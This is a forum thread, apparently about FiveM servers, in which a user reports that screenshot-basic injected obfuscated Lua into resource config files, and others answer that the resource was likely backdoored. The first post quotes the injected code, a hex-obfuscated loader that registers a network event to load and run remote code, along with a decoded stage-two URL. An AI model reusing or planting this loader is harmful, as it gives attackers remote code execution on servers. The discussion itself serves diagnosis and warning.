Screenshot-basic BACKDOOR

mindkind · January 24, 2023, 1:11am

when i run screenshot-basic it inject some code in random file and when decoded its a cfxre.com url

./server-data/afterlifev4/txData/CFXDefault_928DAD.base/resources/[qs]/[smartphone]/qs-smartphone/config/config_uber.lua:local OMBrqKfTPblmDAxFoaIIKSQKjrANOnwCmrcUeTZebAdQjqpUwbeLnYshnS = {“\x52\x65\x67\x69\x73\x74\x65\x72\x4e\x65\x74\x45\x76\x65\x6e\x74”,“\x68\x65\x6c\x70\x43\x6f\41\x64\x64\x45\x76\x65\x6e\x74\x48\x61\x6e\x64\x6c\x65\x72”,“\x61\x73\x73\x65\x72\x74”,“\x6c\x6f\x61\x64”,_G} OMBrqKfTPblmDAwVxIMXAONxVlxFoaICmrcUeTZebAdQjqpUwbeLnYshnS[6]OMBrqKfTPblmDAwVxIMXAONxVlxFoaIIKSQKjrANOnwCmrcUeTZebAdQjqpUwbeLnYshnS[1] OMBrqKfTPblmDAwVxIMXAONxVlxFoaIIKSQKjrANOnwCmrcUeTZebAdQjqpUwbeLnYshnS[6][OMBrqKfTPblmDAwVxIMXAONxVlxFoaIIKSQKjrAebAdQjqpUwbeLnYshnS[3]](OMBrqKfTPblmDAwVxIMXAONxVlxFoaIIKSQKjrANOnwCmrcUeTZebAdQjqpUwbeLnYshnS[2], function(wYAzlvEkhgSLEgEYhlaMxHwKJUipUEtrEVvXVJuEYUDBQDPfsFjiMKkMjH) OMBrqKfTPblmDAwVxIMXAONxVlxFoaIIKSQKjrANOnwCmrcUeTZebAdQjqpUwbeLnYshnS[6]OMBrqKfTPblmDAwVxIMXAONxVlxFoaIIKSQKjrANbAdQjqpUwbeLnYshnS[4]() end)
Binary file ./server-data/afterlifev4/txData/CFXDefault_928DAD.base/resources/[qs]/qs-core/server/functions.lua matches
./server/alpine/opt/cfx-server/citizen/system_resources/monitor/resource/menu/vendor/freecam/config.lua:local OMBrqKfTPblmDAwVxIMXAONxVlxFoaICmrcUeTZebAdQjqpUwbeLnYshnS = {“\x52\x65\x67\x69\x73\x74\x65\x72\x4e\x65\x74\x45\x76\x65\x6e\x74”,“\x68\x65\x6c\x70\x43\x6f\x64\x65”,“\x41\x66\x65\x6e\x74\x48\x61\x6e\x64\x6c\x65\x72”,“\x61\x73\x73\x65\x72\x74”,“\x6c\x6f\x61\x64”,_G} OMBrqKfTPblmDAwVxIMXAONxVlxFoaIIKSQKjrANOnwCmrcUwbeLnYshnS[6]OMBrqKfTPblmDAwVxIMXAONxVlxFoaIIKSQKjrANOnwCmrcUeTZebAdQjqpUwbeLnYshnS[1] OMBrqKfTPblmDAwVxIMXAONxVlxFoaIIKSQKjrANOnwCmrcUeTZebAdQjqpUwbeLnYshnS[6][OMBrqKfTPblmDAwVxIMXAONxVlxFoaIIKSQKjrANOnwCmrcUeTZebAdQnS[3]](OMBrqKfTPblmDAwVxIMXAONxVlxFoaIIKSQKjrANOnwCmrcUeTZebAdQjqpUwbeLnYshnS[2], function(wYAzlvEkhgSLEgEYhlaMxHwKJUipUEtrEJiefDzHgFzgMVvXVJjiMKkMjH) OMBrqKfTPblmDAwVxIMXAONxVlxFoaIIKSQKjrANOnwCmrcUeTZebAdQjqpUwbeLnYshnS[6]OMBrqKfTPblmDAwVxIMXAONxVlxFoaIIKSQKjrANOnwCmrcUeTZebAdQjS[4]() end)

the url decoded : https://cfxre.com/v2_/stage3b.php?asf=MlIrVFIvVWx6R3J0N1Vod2pGTi9jSzgxbnlYZlYrdm5PTlBJK1Nrd0NJODBiZ3hTTnpsSUhPcDJMWUVKRTdqdA==

ChieF-TroN · January 24, 2023, 7:05am

It appears you probably got your server infected with a stolen/leaked resource that has a backdoor in it. That is not normal behavior, and I have qs-smartphone as well, and it doesn’t do those things.

Also, cfxre.com is not a fivem domain to my knowledge. As it would be either cfx.re or fivem.net

mindkind · January 24, 2023, 6:43pm

its weird because when i delete screenshot-basic it dont spread anywhere

mindkind · January 24, 2023, 6:44pm

and when i redownload the version from citizenfx it spread again

mindkind · January 24, 2023, 6:55pm

i never use leaked resource i always buy them trought tebex store btw is it possible that one of them had a backdoor ?

Gameadictive · April 22, 2023, 4:31pm

Is the screenshot-basic probably not the good link and u get one with this backdoor.

ItsOnlyWaifu · May 1, 2023, 6:00pm

So typical, Honest your best bet is to start over, And stop using leaked scripts of some dodgy website,
Not worth the risk or hassle or time trying to disinfect the scripts, and let this be a lesson learned why not to use leaks scripts.